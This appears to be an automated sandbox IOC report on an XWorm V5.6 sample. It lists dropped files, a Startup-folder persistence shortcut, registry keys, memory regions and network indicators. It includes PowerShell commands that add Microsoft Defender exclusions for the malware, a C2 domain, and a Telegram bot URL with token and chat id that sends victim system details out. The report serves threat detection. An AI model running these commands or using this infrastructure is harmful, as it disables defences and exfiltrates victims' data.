IOC Report
VJV2AjJ7Na.exe

loading gif

Files

File Path
Type
Category
Malicious
VJV2AjJ7Na.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Roaming\XClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3215xsqh.mxa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kwlubfa.w5b.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ytiqaum.omr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aid3g2mq.pct.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d345c211.kro.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlgqxa3z.dyl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duyaet4y.crj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipue5a15.5xd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jg04wn2l.bb1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lwtwgnmw.dty.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxmi3xvi.024.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmp4obgy.ppb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phc1oh5n.rii.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmsodh11.axw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uv1su0mt.5wj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbufjtze.jhr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Jul 26 18:22:53 2024, mtime=Fri Jul 26 18:22:53 2024, atime=Fri Jul 26 18:22:53 2024, length=71168, window=hide
modified
There are 10 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\VJV2AjJ7Na.exe
"C:\Users\user\Desktop\VJV2AjJ7Na.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VJV2AjJ7Na.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://api.telegram.org/bot
unknown
malicious
main-although.gl.at.ply.gg
malicious
http://nuget.org/NuGet.exe
unknown
http://crl.m
unknown
http://crl.ml
unknown
https://ion=v4.5alC
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
http://crl.mic
unknown
https://contoso.com/Icon
unknown
http://go.microsoft.c
unknown
http://go.microsoft.ctain
unknown
https://aka.ms/pscore68
unknown
https://api.telegram.org/bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A55D979A7C4323CB5C4DA%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20D3K68%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6
149.154.167.220
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 13 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
main-although.gl.at.ply.gg
147.185.221.21
malicious
ip-api.com
208.95.112.1
malicious
api.telegram.org
149.154.167.220
malicious

IPs

IP
Domain
Country
Malicious
208.95.112.1
ip-api.com
United States
malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
147.185.221.21
main-although.gl.at.ply.gg
United States
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\VJV2AjJ7Na_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7F2000
unkown
page readonly
malicious
29A1000
trusted library allocation
page read and write
malicious
2A00000
trusted library allocation
page read and write
malicious
25A481E0000
heap
page readonly
25A4A333000
trusted library allocation
page read and write
25A468AC000
heap
page read and write
D04000
heap
page read and write
7FFD34830000
trusted library allocation
page read and write
7FFD34800000
trusted library allocation
page read and write
25C12F80000
trusted library allocation
page read and write
7FFD34752000
trusted library allocation
page read and write
7FFD34721000
trusted library allocation
page read and write
7FFD34730000
trusted library allocation
page execute and read and write
7FFD34574000
trusted library allocation
page read and write
569F9CE000
stack
page read and write
7FFD348E0000
trusted library allocation
page read and write
7FFD347D0000
trusted library allocation
page read and write
1DBCFBDE000
trusted library allocation
page read and write
25C167E1000
trusted library allocation
page read and write
1DBDDE53000
trusted library allocation
page read and write
7FFD34720000
trusted library allocation
page execute and read and write
7FFD34960000
trusted library allocation
page read and write
7FFD349B0000
trusted library allocation
page read and write
1DBE6279000
heap
page read and write
7FFD34563000
trusted library allocation
page execute and read and write
7FFD348D0000
trusted library allocation
page read and write
7FFD347E0000
trusted library allocation
page read and write
25C148C8000
heap
page read and write
7FFD34890000
trusted library allocation
page read and write
7FFD34721000
trusted library allocation
page read and write
AF56D7E000
stack
page read and write
25C147D5000
heap
page read and write
BC04A0E000
stack
page read and write
1DBDDE01000
trusted library allocation
page read and write
AF56DFF000
stack
page read and write
7FFD348F0000
trusted library allocation
page read and write
1DBDE0EA000
trusted library allocation
page read and write
7DF46C330000
trusted library allocation
page execute and read and write
25A4910C000
trusted library allocation
page read and write
7FFD345BC000
trusted library allocation
page execute and read and write
7FFD349A0000
trusted library allocation
page read and write
EF5000
heap
page read and write
BC0498C000
stack
page read and write
25C2CDDA000
heap
page read and write
7FFD3462C000
trusted library allocation
page execute and read and write
1C02E000
stack
page read and write
7FFD348C4000
trusted library allocation
page read and write
1C19B000
stack
page read and write
24915B15000
trusted library allocation
page read and write
7FFD34890000
trusted library allocation
page read and write
25A608B8000
heap
page read and write
249147CB000
trusted library allocation
page read and write
BC037F9000
stack
page read and write
1DBDDDE1000
trusted library allocation
page read and write
25C15959000
trusted library allocation
page read and write
7FFD3458D000
trusted library allocation
page execute and read and write
25A49E03000
trusted library allocation
page read and write
1BBEE000
stack
page read and write
249158F7000
trusted library allocation
page read and write
569FC72000
stack
page read and write
24915A8C000
trusted library allocation
page read and write
25C2D112000
heap
page read and write
BC0488A000
stack
page read and write
7FFD347C0000
trusted library allocation
page read and write
25A48597000
trusted library allocation
page read and write
BC033E3000
stack
page read and write
1C09E000
stack
page read and write
2492CDDC000
heap
page read and write
24924994000
trusted library allocation
page read and write
56A0ECE000
stack
page read and write
7FFD3472A000
trusted library allocation
page read and write
AF57F0E000
stack
page read and write
2492CCE0000
heap
page read and write
1BCED000
stack
page read and write
2492CCE8000
heap
page read and write
25C157A0000
trusted library allocation
page read and write
7FFD345CC000
trusted library allocation
page execute and read and write
25A496B8000
trusted library allocation
page read and write
1B6AF000
stack
page read and write
7FFD34990000
trusted library allocation
page read and write
BC03DBE000
stack
page read and write
24912C1D000
heap
page read and write
AF56CFD000
stack
page read and write
7FFD345CC000
trusted library allocation
page execute and read and write
25C12DFB000
heap
page read and write
2492CE3C000
heap
page read and write
7FFD34750000
trusted library allocation
page execute and read and write
7FFD34742000
trusted library allocation
page read and write
56A017A000
stack
page read and write
7FFD349C0000
trusted library allocation
page read and write
25C149E1000
trusted library allocation
page read and write
29F7000
trusted library allocation
page read and write
25A60850000
heap
page read and write
7FFD349A0000
trusted library allocation
page read and write
1DBCED43000
trusted library allocation
page read and write
7FFD34970000
trusted library allocation
page execute and read and write
1DBDE0DA000
trusted library allocation
page read and write
2492CE8B000
heap
page read and write
25A48511000
trusted library allocation
page read and write
7FFD34900000
trusted library allocation
page read and write
1DBCEE1A000
trusted library allocation
page read and write
1DBCEE18000
trusted library allocation
page read and write
25C147D0000
heap
page read and write
7FFD34760000
trusted library allocation
page read and write
56A01F9000
stack
page read and write
7FFD34980000
trusted library allocation
page read and write
7FFD348C0000
trusted library allocation
page read and write
11F0000
heap
page read and write
7FFD34730000
trusted library allocation
page execute and read and write
2491497A000
trusted library allocation
page read and write
7FFD34770000
trusted library allocation
page read and write
AF56EFE000
stack
page read and write
7FFD34873000
trusted library allocation
page read and write
24924BD7000
trusted library allocation
page read and write
1B36A000
stack
page read and write
2492CD31000
heap
page read and write
1BAEF000
stack
page read and write
1DBCEDA6000
trusted library allocation
page read and write
DA7000
heap
page read and write
1B7B0000
heap
page read and write
1DBCC311000
heap
page read and write
24912C03000
heap
page read and write
7FFD34780000
trusted library allocation
page read and write
1C2E0000
heap
page read and write
1DBCDC90000
trusted library allocation
page read and write
24912C49000
heap
page read and write
2492CBE0000
heap
page read and write
7F0000
unkown
page readonly
7FFD34960000
trusted library allocation
page read and write
1DBCC290000
heap
page read and write
1B81C000
heap
page read and write
7FFD34960000
trusted library allocation
page read and write
29FC000
trusted library allocation
page read and write
1DBE65DB000
heap
page read and write
7FFD347B0000
trusted library allocation
page read and write
25A58819000
trusted library allocation
page read and write
24912CF0000
trusted library allocation
page read and write
7FFD348DC000
trusted library allocation
page read and write
EF0A8CC000
stack
page read and write
1DBCC270000
heap
page read and write
25C2D0B7000
heap
page read and write
7FFD347D0000
trusted library allocation
page read and write
25A60B4D000
heap
page read and write
EF096F9000
stack
page read and write
7FFD348C0000
trusted library allocation
page read and write
7FFD349E0000
trusted library allocation
page read and write
7FFD34810000
trusted library allocation
page read and write
25C12FA0000
heap
page read and write
AF57079000
stack
page read and write
7FFD34562000
trusted library allocation
page read and write
7FFD34690000
trusted library allocation
page execute and read and write
1DBCDCC0000
trusted library allocation
page read and write
1B5AE000
stack
page read and write
29EA000
trusted library allocation
page read and write
1DBCEE9D000
trusted library allocation
page read and write
7FFD3493A000
trusted library allocation
page read and write
7FFD347B0000
trusted library allocation
page read and write
7FFD34752000
trusted library allocation
page read and write
BC0367E000
stack
page read and write
EF09C7B000
stack
page read and write
2492CE5B000
heap
page read and write
7FFD3499D000
trusted library allocation
page read and write
24924A41000
trusted library allocation
page read and write
24912D90000
heap
page read and write
24914C1D000
trusted library allocation
page read and write
25C2D027000
heap
page read and write
7FFD34980000
trusted library allocation
page execute and read and write
7FFD34790000
trusted library allocation
page read and write
1DBE6512000
heap
page read and write
1B7AD000
stack
page read and write
1C31E000
heap
page read and write
25C2CDF0000
heap
page read and write
569FD7E000
stack
page read and write
25A46860000
heap
page read and write
2492CCF0000
heap
page read and write
7FFD34626000
trusted library allocation
page execute and read and write
569FF77000
stack
page read and write
AF57239000
stack
page read and write
7FFD34754000
trusted library allocation
page read and write
1DBE6230000
heap
page read and write
DA0000
heap
page read and write
1C2DE000
stack
page read and write
25A482C5000
heap
page read and write
25C16806000
trusted library allocation
page read and write
1DBCF645000
trusted library allocation
page read and write
7FFD34870000
trusted library allocation
page read and write
24915350000
trusted library allocation
page read and write
25C24CEA000
trusted library allocation
page read and write
1D0BC000
stack
page read and write
300A000
trusted library allocation
page read and write
1B7B2000
heap
page read and write
1DBCC2A2000
heap
page read and write
1DBCDD90000
heap
page execute and read and write
7FFD3471A000
trusted library allocation
page read and write
25A495CF000
trusted library allocation
page read and write
24912E05000
heap
page read and write
25C2D0D9000
heap
page read and write
1DBE65D9000
heap
page read and write
25A60B16000
heap
page read and write
7FFD34810000
trusted library allocation
page read and write
7FFD34620000
trusted library allocation
page read and write
AF56E79000
stack
page read and write
7FFD34680000
trusted library allocation
page execute and read and write
25A483C0000
heap
page read and write
D3D000
heap
page read and write
EF09A79000
stack
page read and write
7FFD34742000
trusted library allocation
page read and write
7FFD3457B000
trusted library allocation
page read and write
25C15BF8000
trusted library allocation
page read and write
1AF2C000
stack
page read and write
D11000
heap
page read and write
EF0A94C000
stack
page read and write
AF57138000
stack
page read and write
7FFD34656000
trusted library allocation
page execute and read and write
2492CADF000
heap
page read and write
25A49281000
trusted library allocation
page read and write
EF0A847000
stack
page read and write
24912E00000
heap
page read and write
7FFD34740000
trusted library allocation
page read and write
25C15948000
trusted library allocation
page read and write
1DBE6616000
heap
page read and write
25C2CD96000
heap
page read and write
2960000
heap
page read and write
1DBCC470000
trusted library section
page read and write
24924A43000
trusted library allocation
page read and write
25C12FA5000
heap
page read and write
25C162D1000
trusted library allocation
page read and write
7FFD34626000
trusted library allocation
page read and write
944000
stack
page read and write
7FFD3457D000
trusted library allocation
page execute and read and write
7FFD347C0000
trusted library allocation
page read and write
25C2CEFE000
heap
page read and write
24916573000
trusted library allocation
page read and write
25A58582000
trusted library allocation
page read and write
25C167BC000
trusted library allocation
page read and write
7FFD347B0000
trusted library allocation
page read and write
25C2D016000
heap
page read and write
1DBCE9E0000
trusted library allocation
page read and write
7FFD34590000
trusted library allocation
page read and write
AF57E0E000
stack
page read and write
7FFD348A3000
trusted library allocation
page read and write
7FFD34810000
trusted library allocation
page read and write
7FFD34760000
trusted library allocation
page read and write
2492CA9A000
heap
page read and write
25C2D12B000
heap
page read and write
25A4A313000
trusted library allocation
page read and write
25C2CF02000
heap
page read and write
7FFD349F0000
trusted library allocation
page read and write
25A58541000
trusted library allocation
page read and write
25C15955000
trusted library allocation
page read and write
25C2CEC7000
heap
page execute and read and write
25C12D84000
heap
page read and write
7FFD349B6000
trusted library allocation
page read and write
1DBCDDD5000
heap
page read and write
2492CD4D000
heap
page read and write
25C14810000
trusted library allocation
page read and write
7FFD34780000
trusted library allocation
page read and write
1DBCED54000
trusted library allocation
page read and write
24915358000
trusted library allocation
page read and write
25C155E3000
trusted library allocation
page read and write
7FFD34860000
trusted library allocation
page read and write
25C2CEC0000
heap
page execute and read and write
1DBCC4B0000
heap
page execute and read and write
25A468BE000
heap
page read and write
25C1575D000
trusted library allocation
page read and write
7FFD348A0000
trusted library allocation
page read and write
1DBCDDE1000
trusted library allocation
page read and write
7FFD34580000
trusted library allocation
page read and write
24924A3C000
trusted library allocation
page read and write
7FFD34754000
trusted library allocation
page read and write
24924A49000
trusted library allocation
page read and write
25A4981A000
trusted library allocation
page read and write
EF0967E000
stack
page read and write
249156F5000
trusted library allocation
page read and write
25A49110000
trusted library allocation
page read and write
129A1000
trusted library allocation
page read and write
24912BB0000
heap
page readonly
24914751000
trusted library allocation
page read and write
AF5743B000
stack
page read and write
2492CEA4000
heap
page read and write
7FFD34860000
trusted library allocation
page read and write
7FFD34980000
trusted library allocation
page read and write
7FFD34960000
trusted library allocation
page read and write
2492CD46000
heap
page read and write
7FFD34780000
trusted library allocation
page read and write
25C2D12E000
heap
page read and write
7FFD34870000
trusted library allocation
page read and write
CDC000
heap
page read and write
1DBCF165000
trusted library allocation
page read and write
7FFD348A2000
trusted library allocation
page read and write
25C1596A000
trusted library allocation
page read and write
7FFD34550000
trusted library allocation
page read and write
7FFD349C0000
trusted library allocation
page read and write
1DBE6529000
heap
page read and write
BC03D3C000
stack
page read and write
7FFD34656000
trusted library allocation
page execute and read and write
25C2CEF0000
heap
page read and write
1DBCFBFE000
trusted library allocation
page read and write
1CAB0000
heap
page read and write
129AF000
trusted library allocation
page read and write
D47000
heap
page read and write
25C2D121000
heap
page read and write
7FFD34990000
trusted library allocation
page execute and read and write
25A48180000
heap
page read and write
25A60899000
heap
page read and write
7FFD34744000
trusted library allocation
page read and write
7FFD3486D000
trusted library allocation
page read and write
D13000
heap
page read and write
CD6000
heap
page read and write
AF56FFD000
stack
page read and write
7FFD34820000
trusted library allocation
page read and write
1DBCEE12000
trusted library allocation
page read and write
25A49515000
trusted library allocation
page read and write
25A496EB000
trusted library allocation
page read and write
1DBCC2CC000
heap
page read and write
7FFD348DC000
trusted library allocation
page read and write
BC03CBE000
stack
page read and write
7FFD34740000
trusted library allocation
page execute and read and write
25A4689D000
heap
page read and write
7FFD34840000
trusted library allocation
page read and write
25C15DA5000
trusted library allocation
page read and write
25C15AD9000
trusted library allocation
page read and write
24912C05000
heap
page read and write
24912BC8000
heap
page read and write
25C2D08A000
heap
page read and write
7FFD349E0000
trusted library allocation
page read and write
25A49E62000
trusted library allocation
page read and write
EF093CF000
stack
page read and write
AF5808E000
stack
page read and write
7FFD348D8000
trusted library allocation
page read and write
7FFD347C0000
trusted library allocation
page read and write
25C2D240000
heap
page read and write
25A49DA0000
trusted library allocation
page read and write
7FFD34760000
trusted library allocation
page execute and read and write
7FFD34574000
trusted library allocation
page read and write
1DBDE0D1000
trusted library allocation
page read and write
BC0480E000
stack
page read and write
804000
unkown
page readonly
7FFD347F0000
trusted library allocation
page read and write
7FFD3459B000
trusted library allocation
page execute and read and write
1C6E8000
stack
page read and write
7FFD34970000
trusted library allocation
page read and write
7FFD348D0000
trusted library allocation
page read and write
7FFD346F1000
trusted library allocation
page read and write
1C5EA000
stack
page read and write
7FFD348B0000
trusted library allocation
page read and write
AF5800D000
stack
page read and write
7FFD348B9000
trusted library allocation
page read and write
2492CB41000
heap
page read and write
7FFD34850000
trusted library allocation
page read and write
25C24A11000
trusted library allocation
page read and write
25C16248000
trusted library allocation
page read and write
24912BC0000
heap
page read and write
24912B70000
trusted library section
page read and write
25A60950000
heap
page execute and read and write
7FFD34970000
trusted library allocation
page read and write
1DBCEA4F000
trusted library allocation
page read and write
2492CE87000
heap
page read and write
25C14C09000
trusted library allocation
page read and write
2492CCF4000
heap
page read and write
2492CAE6000
heap
page read and write
7FFD34646000
trusted library allocation
page execute and read and write
25C2D0EF000
heap
page read and write
7DF4B2FC0000
trusted library allocation
page execute and read and write
2491580E000
trusted library allocation
page read and write
1DBE6520000
heap
page read and write
EF0987E000
stack
page read and write
7FFD34570000
trusted library allocation
page read and write
1DBCEF00000
trusted library allocation
page read and write
56A0DCE000
stack
page read and write
AF573BE000
stack
page read and write
7FFD34940000
trusted library allocation
page read and write
24924A4B000
trusted library allocation
page read and write
1DBE6550000
heap
page read and write
7FFD345F0000
trusted library allocation
page read and write
7FFD34730000
trusted library allocation
page execute and read and write
7FFD34770000
trusted library allocation
page read and write
24912AE0000
heap
page read and write
1DBE64E0000
heap
page execute and read and write
25C2CD20000
heap
page read and write
2492CE7E000
heap
page read and write
7FFD34730000
trusted library allocation
page execute and read and write
24915388000
trusted library allocation
page read and write
1AD27000
heap
page read and write
25C14770000
trusted library allocation
page read and write
7FFD345FC000
trusted library allocation
page execute and read and write
25C24A01000
trusted library allocation
page read and write
25A481F0000
trusted library allocation
page read and write
1DBCEF3A000
trusted library allocation
page read and write
7FFD34712000
trusted library allocation
page read and write
7FFD347A0000
trusted library allocation
page read and write
25A60DE0000
heap
page read and write
2990000
heap
page execute and read and write
1DBCC2D0000
heap
page read and write
7FFD34830000
trusted library allocation
page read and write
25A46960000
heap
page read and write
1DBCED4C000
trusted library allocation
page read and write
25C12D78000
heap
page read and write
1DBE6644000
heap
page read and write
24914740000
heap
page execute and read and write
7FFD34543000
trusted library allocation
page execute and read and write
BC038F7000
stack
page read and write
2492CD42000
heap
page read and write
7FFD34820000
trusted library allocation
page read and write
7FFD347F0000
trusted library allocation
page read and write
7FFD34610000
trusted library allocation
page read and write
25C14750000
trusted library allocation
page read and write
7FFD3458B000
trusted library allocation
page read and write
25C12F40000
heap
page read and write
25C15CEC000
trusted library allocation
page read and write
1DBE65FD000
heap
page read and write
7FFD3472A000
trusted library allocation
page read and write
7FFD348D0000
trusted library allocation
page read and write
25A58809000
trusted library allocation
page read and write
11A0000
trusted library allocation
page read and write
1DBCC2EA000
heap
page read and write
1DBCE833000
trusted library allocation
page read and write
7FFD347E0000
trusted library allocation
page read and write
25A46874000
heap
page read and write
25C2CED0000
heap
page read and write
7FFD34690000
trusted library allocation
page execute and read and write
1DBCE9F1000
trusted library allocation
page read and write
1A9D0000
trusted library allocation
page read and write
25A6092B000
heap
page read and write
25C12DB0000
heap
page read and write
7FFD34893000
trusted library allocation
page read and write
7FFD349C0000
trusted library allocation
page read and write
25C2D092000
heap
page read and write
1DBDE0B7000
trusted library allocation
page read and write
7FFD34560000
trusted library allocation
page read and write
BC0397D000
stack
page read and write
1DBCECE6000
trusted library allocation
page read and write
1CDBA000
stack
page read and write
7FFD348D2000
trusted library allocation
page read and write
7FFD34894000
trusted library allocation
page read and write
24915929000
trusted library allocation
page read and write
1DBCE008000
trusted library allocation
page read and write
7FFD348B0000
trusted library allocation
page read and write
25A4873A000
trusted library allocation
page read and write
24912BFD000
heap
page read and write
25A60960000
heap
page read and write
25C2D13D000
heap
page read and write
FFB000
stack
page read and write
24915756000
trusted library allocation
page read and write
2B76000
trusted library allocation
page read and write
7FFD34810000
trusted library allocation
page read and write
1DBE5DED000
heap
page read and write
2492CCC0000
heap
page execute and read and write
7FFD34830000
trusted library allocation
page read and write
25A48260000
trusted library allocation
page read and write
1DBCFC03000
trusted library allocation
page read and write
7FFD349C3000
trusted library allocation
page read and write
25A48220000
trusted library allocation
page read and write
56A104E000
stack
page read and write
BC036FE000
stack
page read and write
1DBE68B0000
heap
page read and write
24912BA0000
trusted library allocation
page read and write
1DBCC200000
heap
page read and write
25C2CFE0000
heap
page read and write
EF0A6CD000
stack
page read and write
1DBCC2C9000
heap
page read and write
25A468E7000
heap
page read and write
25C1626E000
trusted library allocation
page read and write
1DBCF1A5000
trusted library allocation
page read and write
7FFD345F6000
trusted library allocation
page read and write
7FFD3497E000
trusted library allocation
page read and write
7FFD348E0000
trusted library allocation
page read and write
7FFD34660000
trusted library allocation
page execute and read and write
7FFD34840000
trusted library allocation
page read and write
7FFD3459D000
trusted library allocation
page execute and read and write
7FFD346FA000
trusted library allocation
page read and write
7FFD34544000
trusted library allocation
page read and write
56A037E000
stack
page read and write
EF097FB000
stack
page read and write
1DBE65E1000
heap
page read and write
AF572BE000
stack
page read and write
EF099F8000
stack
page read and write
24924760000
trusted library allocation
page read and write
56A0FCC000
stack
page read and write
2492CDDE000
heap
page read and write
EF0A7CE000
stack
page read and write
25A49142000
trusted library allocation
page read and write
25C15B09000
trusted library allocation
page read and write
25C1632F000
trusted library allocation
page read and write
569FCFD000
stack
page read and write
7FFD348C9000
trusted library allocation
page read and write
25A60980000
heap
page read and write
7FFD348C4000
trusted library allocation
page read and write
7FFD347D0000
trusted library allocation
page read and write
7FFD349A0000
trusted library allocation
page read and write
24912B80000
trusted library allocation
page read and write
24912A00000
heap
page read and write
7FFD348C2000
trusted library allocation
page read and write
25C24CD1000
trusted library allocation
page read and write
7FFD34620000
trusted library allocation
page read and write
BC0387F000
stack
page read and write
7FFD34700000
trusted library allocation
page execute and read and write
249145C6000
heap
page read and write
25C15C8B000
trusted library allocation
page read and write
25A587FF000
trusted library allocation
page read and write
25C2D135000
heap
page read and write
1DBCF55F000
trusted library allocation
page read and write
7FFD34950000
trusted library allocation
page read and write
1DBDDDF0000
trusted library allocation
page read and write
11C0000
trusted library allocation
page read and write
24915AD5000
trusted library allocation
page read and write
25A60ACE000
heap
page read and write
1DBCF086000
trusted library allocation
page read and write
7FFD34564000
trusted library allocation
page read and write
7FFD34580000
trusted library allocation
page read and write
25C14EAD000
trusted library allocation
page read and write
25C148B0000
heap
page execute and read and write
2492CDBF000
heap
page read and write
1DBCF72C000
trusted library allocation
page read and write
24915962000
trusted library allocation
page read and write
9E0000
heap
page read and write
25A468A4000
heap
page read and write
25A60885000
heap
page read and write
25A588B7000
trusted library allocation
page read and write
EF0000
heap
page read and write
7FFD34890000
trusted library allocation
page read and write
25A468EB000
heap
page read and write
25A60C80000
trusted library allocation
page read and write
EF09BFF000
stack
page read and write
25A60B4A000
heap
page read and write
1B7B5000
heap
page read and write
2492CCEC000
heap
page read and write
25A58807000
trusted library allocation
page read and write
7FFD347A0000
trusted library allocation
page read and write
24924751000
trusted library allocation
page read and write
DB2000
heap
page read and write
7FFD34980000
trusted library allocation
page read and write
7FFD347C0000
trusted library allocation
page read and write
1DBE62CB000
heap
page read and write
7FFD34620000
trusted library allocation
page read and write
ECC000
stack
page read and write
CD0000
heap
page read and write
569FFFD000
stack
page read and write
EF09AFE000
stack
page read and write
1C2EB000
heap
page read and write
7DF4B2FD0000
trusted library allocation
page execute and read and write
7FFD346E0000
trusted library allocation
page read and write
EF0A64E000
stack
page read and write
24912B00000
heap
page read and write
7FFD34590000
trusted library allocation
page read and write
2492CCFC000
heap
page read and write
7FFD34900000
trusted library allocation
page read and write
25C2CF0E000
heap
page read and write
1C2E9000
heap
page read and write
7FFD34573000
trusted library allocation
page execute and read and write
1DBCDDD0000
heap
page read and write
1DBCF0E7000
trusted library allocation
page read and write
25A608BF000
heap
page read and write
1C8EC000
stack
page read and write
7FFD34702000
trusted library allocation
page read and write
7FFD348F0000
trusted library allocation
page read and write
7FFD34830000
trusted library allocation
page read and write
25C12DB2000
heap
page read and write
25A58511000
trusted library allocation
page read and write
7FFD34690000
trusted library allocation
page execute and read and write
25A60BD2000
heap
page read and write
25C15A9F000
trusted library allocation
page read and write
7FFD34540000
trusted library allocation
page read and write
25C12DCE000
heap
page read and write
1DBCC210000
heap
page read and write
2492CB03000
heap
page read and write
7FFD34740000
trusted library allocation
page read and write
7FFD34899000
trusted library allocation
page read and write
25C12DF6000
heap
page read and write
7DF4B2FE0000
trusted library allocation
page execute and read and write
BC03BB8000
stack
page read and write
EF0938E000
stack
page read and write
7FFD347A0000
trusted library allocation
page read and write
25A468A0000
heap
page read and write
24912BFF000
heap
page read and write
7DF46C340000
trusted library allocation
page execute and read and write
7FFD3462C000
trusted library allocation
page execute and read and write
7FFD348C8000
trusted library allocation
page read and write
7FFD348C0000
trusted library allocation
page read and write
7FFD348CC000
trusted library allocation
page read and write
7FFD349D0000
trusted library allocation
page read and write
7FFD34890000
trusted library allocation
page read and write
7FFD34758000
trusted library allocation
page read and write
7FFD34990000
trusted library allocation
page read and write
